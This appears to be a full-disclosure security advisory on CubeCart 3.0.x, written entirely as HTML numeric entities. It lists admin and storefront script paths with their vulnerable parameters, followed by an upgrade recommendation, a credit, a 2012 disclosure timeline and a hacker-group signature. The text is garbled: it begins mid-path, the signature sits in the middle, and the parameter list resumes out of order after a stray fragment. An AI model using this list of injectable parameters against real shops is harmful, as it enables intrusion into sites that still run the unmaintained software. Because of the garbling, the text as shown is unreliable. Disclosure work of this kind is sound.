&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#83;&#69;&#67;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#108;&#111;&#99;&#105;&#116;&#121;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#108;&#111;&#99;&#105;&#116;&#121;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#114;&#105;&#115;&#105;&#103;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#114;&#105;&#115;&#105;&#103;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#101;&#114;&#99;&#101;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#101;&#114;&#99;&#101;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#114;&#105;&#99;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#114;&#105;&#99;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#87;&#101;&#105;&#103;&#104;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#87;&#101;&#105;&#103;&#104;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#108;&#97;&#116;&#95;&#82;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#108;&#97;&#116;&#95;&#82;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#114;&#101;&#101;&#95;&#83;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#114;&#101;&#101;&#95;&#83;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#67;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#67;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#73;&#116;&#101;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#73;&#116;&#101;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#82;&#111;&#121;&#97;&#108;&#95;&#77;&#97;&#105;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#82;&#111;&#121;&#97;&#108;&#95;&#77;&#97;&#105;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#101;&#120;&#116;&#114;&#97;&#67;&#97;&#116;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#101;&#120;&#116;&#114;&#97;&#67;&#97;&#116;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#95;&#105;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#95;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#111;&#114;&#100;&#101;&#114;&#67;&#111;&#108;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#111;&#114;&#100;&#101;&#114;&#68;&#105;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#97;&#120;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#108;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#112;&#114;&#111;&#100;&#95;&#109;&#97;&#115;&#116;&#101;&#114;&#95;&#105;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#111;&#112;&#116;&#105;&#111;&#110;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#116;&#116;&#114;&#105;&#98;&#117;&#116;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#111;&#112;&#116;&#105;&#111;&#110;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#99;&#117;&#114;&#114;&#101;&#110;&#99;&#121;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#99;&#116;&#105;&#118;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#99;&#117;&#114;&#114;&#101;&#110;&#99;&#121;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#105;&#115;&#111;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#105;&#115;&#111;&#51;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#117;&#109;&#99;&#111;&#100;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#112;&#114;&#105;&#110;&#116;&#97;&#98;&#108;&#101;&#95;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#116;&#97;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#97;&#120;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#99;&#97;&#114;&#116;&#46;&#112;&#104;&#112;&#63;&#97;&#99;&#116;&#61;&#99;&#97;&#114;&#116;&#9;&#40;&#72;&#84;&#84;&#80;&#32;&#82;&#101;&#102;&#101;&#114;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#95;&#49;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#95;&#50;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#111;&#117;&#110;&#116;&#121;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#105;&#114;&#115;&#116;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#108;&#97;&#115;&#116;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#98;&#105;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#111;&#119;&#110;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#10;&#10;&#54;&#46;&#32;&#83;&#79;&#76;&#85;&#84;&#73;&#79;&#78;&#10;&#10;&#84;&#104;&#101;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#51;&#46;&#48;&#46;&#120;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#32;&#102;&#97;&#109;&#105;&#108;&#121;&#32;&#105;&#115;&#32;&#110;&#111;&#32;&#108;&#111;&#110;&#103;&#101;&#114;&#32;&#109;&#97;&#105;&#110;&#116;&#97;&#105;&#110;&#101;&#100;&#32;&#98;&#121;&#32;&#116;&#104;&#101;&#32;&#118;&#101;&#110;&#100;&#111;&#114;&#46;&#10;&#85;&#112;&#103;&#114;&#97;&#100;&#101;&#32;&#116;&#111;&#32;&#116;&#104;&#101;&#32;&#99;&#117;&#114;&#114;&#101;&#110;&#116;&#108;&#121;&#32;&#115;&#117;&#112;&#112;&#111;&#114;&#116;&#101;&#100;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#32;&#45;&#32;&#53;&#46;&#120;&#46;&#10;&#10;&#10;&#55;&#46;&#32;&#86;&#69;&#78;&#68;&#79;&#82;&#10;&#10;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#68;&#101;&#118;&#101;&#108;&#111;&#112;&#109;&#101;&#110;&#116;&#32;&#84;&#101;&#97;&#109;&#10;&#104;&#116;&#116;&#112;&#58;&#47;&#99;&#97;&#114;&#116;&#46;&#99;&#111;&#109;&#47;&#10;&#10;&#10;&#56;&#46;&#32;&#67;&#82;&#69;&#68;&#73;&#84;&#10;&#10;&#65;&#117;&#110;&#103;&#32;&#75;&#104;&#97;&#110;&#116;&#44;&#32;&#91;&#10;&#10;&#10;&#57;&#46;&#32;&#68;&#73;&#83;&#67;&#76;&#79;&#83;&#85;&#82;&#69;&#32;&#84;&#73;&#77;&#69;&#45;&#76;&#73;&#78;&#69;&#10;&#10;&#50;&#48;&#49;&#50;&#45;&#48;&#50;&#45;&#49;&#48;&#58;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#51;&#46;&#48;&#46;&#120;&#32;&#105;&#110;&#32;&#69;&#110;&#100;&#45;&#111;&#102;&#45;&#83;&#117;&#112;&#112;&#111;&#114;&#116;&#47;&#77;&#97;&#105;&#110;&#116;&#101;&#110;&#97;&#110;&#99;&#101;&#32;&#99;&#105;&#114;&#99;&#108;&#101;&#10;&#50;&#48;&#49;&#50;&#45;&#49;&#50;&#45;&#50;&#50;&#58;&#32;&#86;&#117;&#108;&#110;&#101;&#114;&#97;&#98;&#105;&#108;&#105;&#116;&#121;&#32;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#101;&#100;&#10;&#10;&#10;&#49;&#48;&#46;&#32;&#82;&#69;&#70;&#69;&#82;&#69;&#78;&#67;&#69;&#83;&#10;&#10;&#79;&#114;&#105;&#103;&#105;&#110;&#97;&#108;&#32;&#65;&#100;&#118;&#105;&#115;&#111;&#114;&#121;&#32;&#85;&#82;&#76;&#58;&#10;&#91;&#10;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#72;&#111;&#109;&#101;&#32;&#80;&#97;&#103;&#101;&#58;&#32;&#91;&#10;&#10;&#9;&#10;&#35;&#121;&#101;&#104;&#103;&#32;&#91;&#50;&#48;&#49;&#50;&#45;&#49;&#50;&#45;&#50;&#50;&#93;&#10;&#10;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#10;&#66;&#101;&#115;&#116;&#32;&#114;&#101;&#103;&#97;&#114;&#100;&#115;&#44;&#10;&#89;&#71;&#78;&#32;&#69;&#116;&#104;&#105;&#99;&#97;&#108;&#32;&#72;&#97;&#99;&#107;&#101;&#114;&#32;&#71;&#114;&#111;&#117;&#112;&#10;&#89;&#97;&#110;&#103;&#111;&#110;&#44;&#32;&#77;&#121;&#97;&#110;&#109;&#97;&#114;&#10;&#91;&#10;&#79;&#117;&#114;&#32;&#76;&#97;&#98;&#32;&#124;&#32;&#91;&#10;&#79;&#117;&#114;&#32;&#68;&#105;&#114;&#101;&#99;&#116;&#111;&#114;&#121;&#32;&#124;&#32;&#91;&#10;&#10;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#10;&#70;&#117;&#108;&#108;&#45;&#68;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#32;&#45;&#32;&#87;&#101;&#32;&#98;&#101;&#108;&#105;&#101;&#118;&#101;&#32;&#105;&#110;&#32;&#105;&#116;&#46;&#10;&#67;&#104;&#97;&#114;&#116;&#101;&#114;&#58;&#32;&#91;&#10;&#72;&#111;&#115;&#116;&#101;&#100;&#32;&#97;&#110;&#100;&#32;&#115;&#112;&#111;&#110;&#115;&#111;&#114;&#101;&#100;&#32;&#98;&#121;&#32;&#83;&#101;&#99;&#117;&#110;&#105;&#97;&#32;&#45;&#32;&#91;&#93;">&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#115;&#105;&#97;&#110;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#91;&#114;&#101;&#99;&#101;&#105;&#118;&#101;&#114;&#105;&#100;&#93;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#95;&#65;&#73;&#77;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#95;&#65;&#73;&#77;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#66;&#108;&#117;&#101;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#66;&#108;&#117;&#101;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#65;&#118;&#101;&#110;&#117;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40